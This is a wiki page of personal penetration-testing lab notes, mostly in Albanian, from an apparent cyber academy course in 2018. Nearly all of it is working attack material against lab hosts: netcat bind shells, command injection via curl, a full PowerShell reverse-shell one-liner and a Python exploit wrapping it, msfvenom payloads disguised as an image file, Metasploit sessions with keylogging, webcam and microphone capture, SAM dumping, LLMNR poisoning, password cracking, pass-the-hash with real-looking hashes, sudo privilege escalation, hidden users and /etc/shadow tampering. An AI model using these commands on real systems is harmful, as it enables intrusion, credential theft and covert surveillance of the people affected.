dardan:cyberacademy:challenges
###INTERRUPT IN BOOT###
Kur t'bohet load Grub Screen, e shtypim E
mount -o remount,rw /
.##################################################################################
###HAP BACKDOOR####
ne host A e hap nje port
#nc -lvp 667 -e /bin/bash
nga host B lidhet ne host A
#nc 192.168.0.110 667
.##################################################################################
###SKENAR### ### DIRB & CURL ###
172.16.60.59 ##Target IP
nje Ip me hack, enumeration, to get access, verify
-e gjen linkun problematik me dirb ( directory browse)
-e bon run skipten ne file e dyshimt per ta hap session
root@CyberACAD:/home/dardan# curl http://172.16.60.59/index.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
-per tju qas sessionit te hapur me lart
dardan@CyberACAD:~$ nc 172.16.60.59 31337
echo 'index.php' | base64 ## encode
echo 'aW5kZXgucGhwCg==' | base64 -d ## decode
.##################################################################################
###SKENAR###WORDPRESS###
merr nje file
#wget http://wordpress.org/latest.zip
#wget http://wordpress.org/latest.tar.gz
unzip
#unzip latest.zip
#tar -zxvf latest.tar.gz
#delete latest.zip
#rm -rf latest.zip
barte file to var/www/html nese e ke shakrku duku tjeter
#mv wordpress var/www/html
barti krejt nga wordpress folderi nje hap mbrapa
#mv * ../
Access mysql
#mysql -u root -p
#create db
#create database dr;
edit sample file
#vi wp-config-sample.php
#edit
#database name / user / password
replace modified file
#mv wp-config-sample.php wp-config.php
ne browser krijo account ne WP
#http://IP ose name i appache service
krijo user ne web form
###Script me kriju e cila e shkarkon wordpress edhe i exekution krejt hapat si ne ushtrime###
#! /bin/bash
cd /var/www/html
wget http://wordpress.org/latest.zip
unzip latest.zip
cd wordpress
mv * ../
cd ..
rm -rf latest.zip wordpress
cp wp-config-sample.php wp-config.php
mysql -uroot -pPassword -e "create database xxDB;"
Ose
mysql --host=localhost --user=root -pPassword
CREATE DATABASE xxDB;
SHOW databases;
chmode a=x wp-auto ## e bon executable
bash wp-auto ## ose e bon run si script
link
http://www.codingpedia.org/ama/how-to-create-a-mysql-database-from-command-line/
.##################################################################################
###SKENAR###Me kriju qasje ne SSH pa u athentiku###
krijo file ~/.ssh
un-auth access client to server
mkdir.ssh/ ##create .ssh if it is not created
server@CyberACAD:~/.ssh$ ssh-keygen ## generate keys
scp id_rsa.pub client@172.16.60.47:/home/client/.ssh/
client@xx:~/home/client/.ssh$ mv id_rsa.pub authorized_keys
ssh server@172.16.60.47 ## try to access client to server
:)
#ne Server
ssh-keygen
touch authorized_keys
cat id_rsa.pub > authotized_keys
.##################################################################################
###backdoor, remote code execution, intro###
curl https://google.com ##Lexon kontentin
curl https://google.com/x.php?cmd\=cat+/passwd
cmd\=cat+/passwd
cmd\=cat+/
curl http://172.16.60.59/run.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
.##################################################################################
###SKENAR###me marr qasje prej mysql ne shell access###
\! nc -lvp 8888 -e /bin/bash
\! id
nc ip 8888
ls
id
dw wp
unzip
cmv wp content to /html
mysql -u root -p
creat database xx;
edito wp-config.php db name, user, password
brows IP/wp-config.php
create user/password
install wordpress
cd user/share/webshell
create a file with code run.php upload on /html
curl http://ip/run.php\?cmd\=nc+-lvp+1337+-e+bin/bash
nc ip 1337
id
ls
cat wp-config.php
python-c 'import pty; pty.spawn("/bin/bash")'
mysql -u$root -p$xxxx -e "\! id"
"os python libraria" ta jep mundesi me execute comanda te systemit
mysql -H ip ## te qon remote
.##################################################################################
###SKENAR###Challenge###
1.Keni me startu nje web apache server, me gjeneru log-sa, me gjeneru spaku 100 lines of code, keni me ndertu nje automated script me kete logjike, ku IP unike i merr dhe i kthen ne base64, dhe i ke echo vetem vlerat e base64. Pra me lexu log-un, access.log edhe me i nxjerr IP me i sortu unike dhe me i kthye vetem vlerat e tyre base64, e jo ne plain text.
Startim i web apache server te gjenerimi i logsave logs of code gjenerete script ku me i nxjerr ip dhe me i kthy ip ne base 64
Zgjidhja:
#!/bin/bash
cat /var/log/apache2/access.log | grep "172.16" | cut -d " " -f 1 | sort -u > ips.txt
for i in $(cat ips.txt); do echo $i| base64; done
2.Research qysh me shtu user pa kriju home directory- kur shkon ne Ls /home/ mos me ekzistu, basically i bjen user i fshehte
Dhe ne Ssh me u kyc me kete user qe kemi krijuar pa home directory
3. Heqeni hash-in, shtoni hash-in e juaj, kycuni me passwordin e hash-it juaj, kryeni pune dhe pasi te kryeni pune ktheni hash-in qe ishte fillimisht.
Eshte nje password “ubuntu” ky password e ka nje hash, ky hash nuk mundet kurre me u kthy ne “ubuntu”, gjithmone eshte ky hash value, ky hash eshte i ruajtur ne /etc/shadow, ne nuk e dijme qe ky hash e ka plain text “ubuntu”, per kete arsye duhet me e heq kete hash dhe me shtu nje hash te ri, ku ne e dijme passwrodin. Psh password e kthejme ne hash, dhe kete hash e ruajme atje ku duam ta nderrojme hashin. Pastaj mund tbejme login si password, kryjme pune dhe pastaj e kthejme hashin “ubuntu”.
Ekziston encrypted sh512 ne /etc/shadow
E kemi harru pass po dojme me bo access ne kete file qysh me e nderru hash qe me e nderru pass me e kry punen dhe me e kthye hashin e vjeter
Sudo cat /etc/shadow
Te zgjidhura nga Arbeni:
Krijimi i nje useri qe nuk ka /home directory:
https://asciinema.org/a/To1xwcgCmjb06umuOUGIAO2vF
komanda"--no-create-home" e krijon nje user pa home directory por kur mundohemi me ju qas me ssh apo protokol tjeter nuk mundemi sepse nese e lexojm fajllin /etc/passwd e shohim qe ai user nuk ka "entry point" dmth nuk ka shell /bin/bash
komanda "--no-create-home --shell /bin/bash" e ben te kunderten e komandes me lart
Shtimi apo ndrrimi i passwordit te nje useri duke modifikuar fajllin /etc/shadow
Ekzistojn disa metoda, 4 nder to jane:
https://asciinema.org/a/zk6zChlDAhR9fIrXMz5bVPckV | chpasswd
https://asciinema.org/a/hKSm9dZCY2pOqLWhAC2nr59Db | openssl
https://asciinema.org/a/PKUxOrkmvLJyuk0DlISJc8Xpb | perl
https://asciinema.org/a/y0mzjwp4YsoRTE17GGxwTIEcX | python
----------------------------------------------------------------------------
python -c 'import crypt; print crypt.crypt("arben123", "$6$SalTTeSt$")'
perl -e 'print crypt("arben123","\$6\$saltsalt\$") . "\n"'
openssl passwd -1 -salt CyBeR arben2
echo "username:password" | chpasswd
.##################################################################################
###SKENAR###Challenge##
1. Me gjet nje file qe permban keys per nje protokoll te caktuar,
2. Me u lidh me nje user te caktuar duke perdorur nje komand qe te len me percaktu keyn
3. Me ekzekutu komanda te sudo dhe me lexu nje fajll ne folderin /root
Me gjet nje file qe permban keys per nje protokoll te caktuar, e perdor per me u lidh me nje protokoll qe eshte i sigurt, useri nuk eshte sudo por lejohet te exe ca komanda si sudo
Hint:
172.16.60.81
Cmd =cd+/root
base64
Ls –al
Ssh –i fajlli IP
Sudo /bin/cat
Comment
FILES
Description
Add another file (Maximum size: 5 MB)
Save Cancel Preview
Powered by OpenProject
.##################################################################################
###SKENAR##Export SAM and system file###
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool per mi hap sma and system files
pwdump system sam (run in folder where sam and system file are located)
.##################################################################################
###SKENAR###Responder & John & PASS the HASH###
RESPONDER
#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0
Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01
Error is returned to the client machine from Responder.py that windows can not access it.
#cd logs/ ls (to comfirm if hash log file is created
JOHN
#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
John hash2.txt - -wordlist=/root/Desktop/rockyou.txt
John - -show hash2.txt
John - -show =hash2.txt
Cat john.pot
john hh.txt - -wordlist=/root/Desktop/rockyou.txt
john hh.txt - -show
cd
~/.john
Cd ~
Cd .john
PASS the HASH
Cd pth-toolkit-master/
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 ‘net user a a /add’
pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8
*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*
The good news is this attack is fairly easy to prevent. Note, that both LLMNR and NetBIOS Name Service need to be disabled, if you only disable LLMNR then Windows will failover to NetBIOS Name Server for resolution
.##################################################################################
###SKENAR###Challenge###16.05.2018
target 172.16.60.85 Ubuntu-10ubuntu0.1
PORT STATE SERVICE
80/tcp open http
1
# dirb http://172.16.60.85
http://172.16.60.85/id_rsa
2
# wget http://172.16.60.85/id_rsa
# chmod 400 id_rsa
# ssh -i id_rsa cyberacademy@172.16.60.85
merr qasje $
3
$ ps -aux ## per ta par executable file
$ locate xxxx.py ##per ta gjetur lokacionin
$ cd /usr/bin
$ python2.7 Administrator_Password.py ## ky tregon te dhenat e next target
Next target was a windows its credentials was given in that file
4
- me te dhenat e gjetura qasesh RDP ne target PC
- metod tjeter nga nje linux OS
# rdesktop -u Administrator 172.16.65.92
-kliko easy access (do te hapet cmd nese eshte ndrequr mepare)
me gjet hiden file me info te next target
5
ne next target machine
$ sudo -l ##tregon comands qe munet mi bo run si user
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
# :)
.##################################################################################
###SKENAR###Challenge###18.05.2018
Target 172.16.60.92
Basic Linux Commands
https://www.youtube.com/watch?v=tgcxc1xg87Y
rdesktop (ip) -r disk:share=/home/bayo/store
172.16.60.92
3389
22
445
Linux:
# rdesktop 172.16.65.120 –r disk:share=/usr/share/windows-binaries
Windows:
> nc.exe -lvp 777 -e cmd.exe
Linux: nc 172.16.60.67 777
.##################################################################################
###SKENAR###msfvenom & msfconsole###
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > show options
msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 4477
msf exploit(multi/handler) > exploit
pret deri sa te executon dikush malware, ne kete rast te hostuar ne http
pasi te executohet malware vjen sessioni
sessions
sessions -i 5 --numrin e sesionit
##################################################################################
###SKENAR###Challenge###21.05.2018
ident. alive hosts
seq 1 254
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done
cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2
nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports
nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap
nmap 172.16.60.1/24 -p- -- -p- check all range ports
nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port
attempts on open ports found via nmap
ftp
try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19
pasi ke marr access ne shell
ssh -R cyberacademy2018:80:localhost:80 serveo.net
rtsp 554 /me vlc
ne vlc network url: rtsp:172.16.1.19:554
snmp
sudo msfconsole
auxiliary
set community filename
exploit
search ms17-010
windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash
----------------------------------------------------------------------------
library hijack
import os
import sys
import random_useragent
while True:
ping = raw_input ("input: ")
if '&&' in ping:
print ;hacker....:
sys.exit()
elif '|' in ping:
print ;hacker....:
else
os.system('ping {}'.format(ping))
python_py aa_py
input: import os;os.system('net user a a /add')
.##################################################################################
###SKENAR###SSHUTTLE###23.05.2018
ssh uttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
sshuttle -r turbo@172.16.65.117
ssh -R cyberacademy2018:80:localhost:80 serveo.net
http://cyberacademy.serveo.net/
google.com | ifconfig
google.com| nc -lvp 5555 -e /bin/bash
google.com && ls
172.16.65.117 (linux)
nc 172.16.65.117 5555
te ky target me ps -aux ( e sheh nje process turbo_is_turbo)
cat /etc/passwd ( per me verifiku user turbo)
putty 172.16.65.117 turbo/turbo
sudo -l (eshte gjet find qe ka root privilegje)
sudo find /etc/passwd -exec /bin/sh \;
sudo find /etc/passwd -exec nc -lvp 7878 /bin/sh \;
id
nc 172.16.65.117 7878
id
cat info.txt (target 172.16.65.120)
rdesktop 172.16.65.120
5 time shift cmd
ipconfig ( e sheh qe host eshte i lidhun edhe me nje rrjete tjeter)
arp -a (e sheh qe 10.0.1.4 ka komuniku me local host 10.0.1.3)
scanon portet me nc ose nmpa ( gjinden 21, 22, 80)
ne http te 10.0.1.4 browser tregon nje user edhe password
sudo python -c 'import pty;pty.spawn("/bin/bash");'
.##################################################################################
###SKENAR###Challenge PowerSHELL###25.05.2018
power shell
cat oneliner.tcp
ip: 172.16.60.54
nmap -sV 172.16.60.54
80 - eshte gjet hap
ne local machine
nc -lnvp 5588
permes web app ne target IP e run kete shell cmd
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kjo na jep qasje ne shell te target
kalo ne desktop te userit
C:\users\arben\Desktop>
Get-item -Path C:\Users\arben\Desktop\root.txt -stream *
Get-Content -Path C:\Users\arben\Desktop\root.txt -stream target.txt
cyber@172.16.60.65
pass: 123Arben123
me te dhenat e gjetura hym me ssh
ssh cyber@172.16.60.65
pass: 123Arben123
$
$ sudo -l
eshte gjet
/bin/dash /home/cyber/root_me
$ cat /home/cyber/root_me
shihet permbajtja e scriptes
#!/bin/dash
sudo /bin/dash /home/cyber/root_me
# :) root
-----------------------------------------------------------------------------
nano exploit.py
import os
import sys
import requests
ip = sys.argv[1]
port = sys.argv[2]
r = requests.get("http://172.16.60.54/system.php?ping=google.com+%26%26+powershell+-command+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27{}%27%2C{}%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2++%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22".format(str(ip), port))
python exploit.py IP with listen port open + port
python exploit.py 172.16.60.68 4433
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
set lport 4477
set rhost 172.16.60.76
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
> set lhost 172.16.60.68
> set lport 5560
chmod a+x reverse_tcp.elf
hendler = pret ose servon
.##################################################################################
###SKENAR### Challenge###30.05.2018
=====================
Target: 172.16.65.97
windows/smb/ms08_067_netapi
windows/smb/psexec
run post/windows/manage/enable_dp
run post/windows/gather/
sysinfo
netstat -a
meterpreter >
shell
ipconfig, cd c:, reg same hkml\sam dhe system, net user, net localgroup administrators user /add
net user test ters
net localgroup administrators test /add
net user test /active:yes
net user Administrator
background
getsystem
getuid
getpid
ps --
pkill 2420
migrate 1756 ##kalon ne procese
keyscan_start
webcam xx ##snapshot me marr
webcam_stream
record_mic -d 10
mdf exploit(windows/smb/psexec) >
> session 2xtab
> session -i 2
msf exploit(windows/
.##################################################################################
###SKENAR###msfconsole### 01.06.2018
target: 172.16.60.96
metoda: buffer overflow, banner grabbing, metasploit, search the vurnelabilities, exploitation
nmap 172.16.60.96
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sV --script=banner 172.16.60.96
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7
80/tcp open http BadBlue httpd 2.7
Service Info: Host: IEWIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
msf > search badblue
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/badblue_ext_overflow 2003-04-20 great BadBlue 2.5 EXT.dll Buffer Overflow
exploit/windows/http/badblue_passthru 2007-12-10 great BadBlue 2.72b PassThru Buffer Overflow
###merr sessionin e pare
msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > show options
msf exploit(badblue_passthru) > set RHOST 172.16.60.96
msf exploit(badblue_passthru) > set TARGET 1
msf exploit(badblue_passthru) > exploit
meterpreter > sysinfo
###e perdor sessionin e krijuar me pare
use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > show options
msf exploit(bypassuac_injection) > set session3 1
msf exploit(bypassuac_injection) > exploit
meterpreter > getuid
meterpreter > getsystem
meterpreter > getuid
msf > use post/windows/gatherc3/credentials/sso
msf post(sso) > show options
msf post(sso) > set session 2
msf post(sso) > exploit
[*] Running module against IEWIN7
Windows SSO Credentials
=======================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;72208 NTLM IEWIN7 IEUser Passw0rd!
0;72208 NTLM IEWIN7 IEUser
0;72286 NTLM IEWIN7 IEUser Passw0rd!
0;72286 NTLM IEWIN7 IEUser
0;83203 NTLM IEWIN7 sshd_server D@rj33l1ng
0;83203 NTLM IEWIN7 sshd_server
[*] Post module execution completed
.##################################################################################
###SKENAR###nmap, hydra ose meduza###01.06.2018
root@kali:/# nmap -sV --script=banner 172.16.60.76
Nmap scan report for 172.16.60.76
Host is up (0.0066s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Service
Service Info: Host: ARBEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
brootforce RDP me hydra ose meduza tu e perdor rockyou.txt
.##################################################################################
###SKENAR###msfvenom & msfconsole###
##Challenge##04.06.2018
TARGET: 172.16.60.91
msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py
msfconsole -q
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 172.16.60.78
set lport 9999
exploit -j
cat shell.py
copy content of shell.py
paste ne python interpreter on web
pret sessionin
sessions
sessions -i 1
getuid
shell
bash
python -c 'import pty; pty.spawn(/bin/bash")'
ls
debugger.sh
cat debugger.sh
...
.##################################################################################
###SKENAR### version of ftp running on target
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
.##################################################################################
###BANNER GRABBING
nmap -sS -p 80 -A 192.168.0.1
dardan/cyberacademy/challenges.txt · Last modified: 2018/09/01 21:47 by dardan